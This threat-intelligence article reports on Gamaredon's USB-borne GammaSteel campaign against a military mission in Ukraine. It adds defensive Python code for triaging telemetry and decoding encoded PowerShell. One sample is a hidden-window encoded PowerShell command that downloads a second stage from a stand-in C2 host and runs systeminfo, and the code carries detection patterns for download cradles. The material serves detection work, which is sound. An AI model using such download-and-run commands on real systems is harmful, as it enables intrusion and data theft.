The Russian-affiliated cyber espionage group known as Gamaredon, also referred to as Shuckworm, has been implicated in a cyber attack targeting a foreign military mission stationed in Ukraine. The primary objective of this operation was to deploy an enhanced variant of the GammaSteel malware, a tool designed for information theft.
According to the Symantec Threat Hunter team, the initial signs of this malicious activity emerged on February 26, 2025. The attackers employed an infected removable drive as the entry point to infiltrate the targeted systems. This method underscores the group’s strategic use of physical media to bypass traditional network defenses and establish a foothold within secure environments.
Infection Mechanism and Execution Chain
The attack commenced with the creation of a Windows Registry value under the UserAssist key. This was followed by the execution of mshta.exe via explorer.exe, initiating a multi-stage infection process that deployed two critical files:
1. NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms: This file facilitated communication with the command-and-control (C2) server. The malware retrieved the C2 server’s address by accessing specific URLs associated with legitimate services such as Teletype, Telegram, and Telegraph. This technique of leveraging trusted platforms for C2 communication is a hallmark of Gamaredon’s approach, complicating detection efforts.
2. NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms: Designed to propagate the infection, this file targeted removable and network drives. It created shortcut files for each folder, executing the malicious mshta.exe command while concealing its presence. This method ensures the malware’s persistence and facilitates its spread across connected systems.
On March 1, 2025, the malware executed a script to contact the C2 server, exfiltrate system metadata, and receive a Base64-encoded payload. This payload initiated a PowerShell command to download an obfuscated version of the original script, perpetuating the infection cycle.
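Each step of the chain above leaves an ordinary endpoint telemetry trace: a process-creation event for mshta.exe with explorer.exe as parent, a file-creation event for the registry-log lookalikes, and shortcut files appearing on removable media. The following Python is an added example written for this article, not code from Symantec's report or from the malware itself; the Sysmon-like event shape, the host name, file locations, the GUID in the benign file name and the assumption that E: and F: are removable drives are all constructed for the demonstration.

```python
"""Added example: triage constructed endpoint telemetry for the chain described
above (explorer.exe -> mshta.exe, decoy files named like registry transaction
logs, shortcut files dropped on removable media)."""
import re
from pathlib import PureWindowsPath

# Decoy file names from the report: NTUSER.DAT.TMContainer<digits>.regtrans-ms.
# Genuine registry transaction logs are maintained by the system, so the
# signal used here is the writer: a script host should never create one.
REGTRANS_LOOKALIKE = re.compile(r"NTUSER\.DAT.*\.TMContainer\d+\.regtrans-ms$", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# Assumption: on this host E: and F: are removable drives (from device inventory).
REMOVABLE_DRIVES = {"E:", "F:"}

# Constructed sample events in a Sysmon-like shape (id 1 = process create,
# id 11 = file create). Paths, host name and GUID are illustrative, not from the incident.
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws01", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"id": 11, "host": "ws01", "image": r"C:\Windows\System32\mshta.exe",
     "target": r"C:\Users\victim\AppData\Local\Temp\NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms"},
    {"id": 11, "host": "ws01", "image": r"C:\Windows\System32\mshta.exe",
     "target": r"E:\Reports.lnk"},
    # Benign: the system maintaining a real transaction log in the profile root.
    {"id": 11, "host": "ws01", "image": "System",
     "target": r"C:\Users\victim\NTUSER.DAT{6f2c1a3e-9b1d-4c0e-8a2f-1234567890ab}.TMContainer00000000000000000001.regtrans-ms"},
    # Benign: a user opening Notepad from the shell.
    {"id": 1, "host": "ws01", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe"},
]


def image_name(path):
    """Lower-cased file name of a Windows image path ('System' stays a bare name)."""
    return PureWindowsPath(path).name.lower()


def triage(event):
    """Return the list of findings (possibly empty) for one event."""
    findings = []
    if event["id"] == 1:
        if image_name(event["image"]) == "mshta.exe" and image_name(event["parent"]) == "explorer.exe":
            findings.append("mshta.exe launched by explorer.exe (shortcut or double-click)")
    elif event["id"] == 11:
        target = PureWindowsPath(event["target"])
        writer = image_name(event["image"])
        if REGTRANS_LOOKALIKE.search(target.name) and writer in SCRIPT_HOSTS:
            findings.append(f"registry-log lookalike {target.name} written by {writer}")
        if target.suffix.lower() == ".lnk" and target.drive.upper() in REMOVABLE_DRIVES:
            findings.append(f"shortcut {target.name} dropped on removable drive {target.drive}")
    return findings


def scan(events):
    """Run triage over a sequence of events; returns (host, finding) pairs."""
    return [(e["host"], f) for e in events for f in triage(e)]


if __name__ == "__main__":
    for host, finding in scan(SAMPLE_EVENTS):
        print(f"{host}: {finding}")
```

Keying the file-name rule on the writing process rather than on the name alone keeps the system's own transaction-log maintenance from raising alerts; in a real deployment the removable-drive set would come from the host's volume inventory rather than a hard-coded list.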
Advanced Reconnaissance and Data Exfiltration
The updated script connected to a hard-coded C2 server to retrieve two additional PowerShell scripts:
1. Reconnaissance Utility: This tool performed comprehensive system surveillance, including capturing screenshots, executing the systeminfo command, identifying active security software, enumerating files and folders on the Desktop, and listing running processes. Such extensive reconnaissance enables attackers to assess the system’s defenses and identify valuable data.
2. Enhanced GammaSteel Malware: An improved version of the known information stealer, this malware exfiltrated files from the victim’s system based on a predefined list of file extensions, focusing on data within the Desktop and Documents folders. The targeted file types often include sensitive documents, spreadsheets, and other critical information.
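Both the Base64-encoded PowerShell stage described earlier and the reconnaissance script above are reachable from process command lines once the encoding is undone. The following Python is an added example for this article, not code from Symantec's report or from the malware; the indicator patterns are my own illustrative choices rather than a vetted rule set, and the sample script, the hidden-window flags and the .invalid URL are constructed here rather than taken from the incident.

```python
"""Added example: recover the script carried in a PowerShell -EncodedCommand
argument and tag the behaviours the report describes (fetching a further
stage, host reconnaissance, screenshot capture)."""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest first.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Behaviour indicators loosely based on what the loader and recon script do.
# Assumption: these regexes are illustrative, not a production detection rule set.
INDICATORS = {
    "download cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.IGNORECASE),
    "host recon": re.compile(r"\bsysteminfo\b|Get-Process|Get-ChildItem", re.IGNORECASE),
    "screenshot": re.compile(r"CopyFromScreen|System\.Drawing", re.IGNORECASE),
}

# Constructed sample: a stage-2 fetch plus a systeminfo call, encoded the way
# PowerShell expects (UTF-16LE, then Base64). The URL uses the reserved .invalid TLD.
SAMPLE_SCRIPT = ("$w = New-Object Net.WebClient; "
                 "$s = $w.DownloadString('http://c2.example.invalid/stage2'); "
                 "systeminfo")
SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -enc "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii"))
BENIGN_CMDLINE = "powershell.exe -NoProfile -Command Get-Date"


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        # Malformed Base64 or non-UTF-16 payload: leave it for manual review.
        return None


def classify(cmdline):
    """Sorted names of the indicators matched by the decoded (or plain) script."""
    script = decode_encoded_command(cmdline) or cmdline
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script))


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMDLINE))
    print(classify(SAMPLE_CMDLINE))
    print(classify(BENIGN_CMDLINE))
```

Decoding before matching matters because the encoded form hides every keyword; matching on the raw command line would see only the flag and an opaque blob. Obfuscated scripts, as the report notes the later stage was, will need a further deobfuscation pass before these patterns apply.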
Implications and Tactical Evolution
This incident signifies a notable advancement in Gamaredon’s operational tactics. Historically perceived as less sophisticated compared to other Russian cyber actors, Gamaredon compensates through relentless targeting of Ukrainian entities. The group’s continuous refinement of its code, incorporation of obfuscation techniques, and utilization of legitimate web services for C2 communication reflect a concerted effort to evade detection and enhance operational effectiveness.
The strategic use of infected removable drives highlights the persistent threat posed by physical media as vectors for cyber attacks. Organizations, particularly those handling sensitive information, must implement stringent security protocols to mitigate such risks. These measures include disabling autorun features, conducting regular scans of removable media, and educating personnel on the dangers of connecting unverified devices to secure systems.
In conclusion, Gamaredon’s latest campaign underscores the evolving landscape of cyber threats and the necessity for continuous vigilance and adaptation in cybersecurity practices. The group’s ability to innovate and adapt its methods serves as a stark reminder of the challenges faced in defending against state-sponsored cyber espionage activities.